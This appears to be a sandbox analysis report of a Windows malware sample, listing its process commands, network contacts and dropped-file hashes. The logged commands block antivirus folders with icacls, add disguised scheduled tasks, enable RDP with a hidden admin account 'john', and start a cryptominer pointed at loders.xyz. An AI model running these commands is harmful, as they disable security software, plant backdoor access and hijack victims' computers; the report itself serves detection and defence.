C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\ProgramData\Microsoft\Intel\R8.exe

C:\ProgramData\Microsoft\Intel\R8.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv 9kLyR5iSeUyzqWd6LudYsQ.0.2

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u RandomX_CPU --donate-level=1 -k -t4

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 101.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 83.205.213.95.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 251.200.0.194.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 wininit.club udp
US 8.8.8.8:53 winibackup.club udp
IS 93.95.230.192:80 winibackup.club tcp
US 8.8.8.8:53 winibackup98.club udp
IS 93.95.230.192:80 winibackup98.club tcp
US 8.8.8.8:53 winibackup549.club udp
IS 93.95.230.192:80 winibackup549.club tcp
US 8.8.8.8:53 192.230.95.93.in-addr.arpa udp
US 8.8.8.8:53 wininit.club udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 winibackup.club udp
GB 142.250.200.3:80 c.pki.goog tcp
IS 93.95.230.192:80 winibackup.club tcp
US 8.8.8.8:53 winibackup98.club udp
IS 93.95.230.192:80 winibackup98.club tcp
US 8.8.8.8:53 winibackup549.club udp
IS 93.95.230.192:80 winibackup549.club tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 dashost.club udp
DE 195.201.70.87:80 dashost.club tcp
US 8.8.8.8:53 87.70.201.195.in-addr.arpa udp
US 8.8.8.8:53 loders.xyz udp
RU 185.255.134.239:3333 loders.xyz tcp
US 8.8.8.8:53 239.134.255.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\aut6E4B.tmp

MD5 204d1fc66f62b26d0b5e00b092992d7d
SHA1 e9a179cb62d7fddf9d4345d76673c49c88f05536
SHA256 69c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b
SHA512 cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\ProgramData\Windows\winit.exe

MD5 701f0baf56e40757b2bf6dabcdcfc7aa
SHA1 cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4
SHA256 8e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370
SHA512 e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

C:\ProgramData\Windows\reg1.reg

MD5 4dc0fba4595ad8fe1f010f9079f59dd3
SHA1 b3a54e99afc124c64978d48afca2544d75e69da5
SHA256 b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a
SHA512 fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/4896-52-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4896-56-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-59-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-62-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-64-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-65-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3672-67-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3672-71-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3672-70-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3672-68-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3672-69-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2564-74-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2564-77-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\Windows\vp8decoder.dll

MD5 88318158527985702f61d169434a4940
SHA1 3cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA256 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA512 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

C:\ProgramData\Windows\vp8encoder.dll

MD5 6298c0af3d1d563834a218a9cc9f54bd
SHA1 0185cd591e454ed072e5a5077b25c612f6849dc9
SHA256 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

memory/2564-76-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3672-80-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2564-75-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2564-73-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-63-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-61-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1628-60-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4896-57-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4896-55-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4896-54-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4896-53-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4896-51-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\ProgramData\install\cheat.exe

MD5 b8aa5d85128fe955865bfd130fd6ed63
SHA1 51119e37d2dc17eefdb6edb5d032fb77949038b8
SHA256 cb18b89fdff97f6d3a7ec89456818163d21c24607b7b04cf513af0d03d804ac9
SHA512 059b281e3d0f8f5d7004a82291d18be591468fcdb56c8b5122c1cc245425dcdfde4cfb229fc58a9a438532fdd293e73b87d9228753a670872d591aeb98f3e0c7

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 23d51bd68920fdfd90809197b8c364ff
SHA1 5eee02db6087702db49acb2619e37d74833321d9
SHA256 0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1
SHA512 3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7

memory/2564-112-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\Programdata\RealtekHD\taskhostw.exe

MD5 21feb5dccba8bf69df9a2307d206d033
SHA1 65fc243a3530225903bf422f19ffd0e3aad66f03
SHA256 ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493
SHA512 b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca

C:\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

C:\rdp\run.vbs

MD5 6a5f5a48072a1adae96d2bd88848dcff
SHA1 b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256 c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512 d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

C:\rdp\pause.bat

MD5 a47b870196f7f1864ef7aa5779c54042
SHA1 dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA256 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512 b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

memory/2564-152-0x0000000000400000-0x0000000000AB9000-memory.dmp

C:\programdata\microsoft\temp\H.bat

MD5 ec45b066a80416bdb06b264b7efed90d
SHA1 6679ed15133f13573c1448b5b16a4d83485e8cc9
SHA256 cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e
SHA512 0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

C:\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

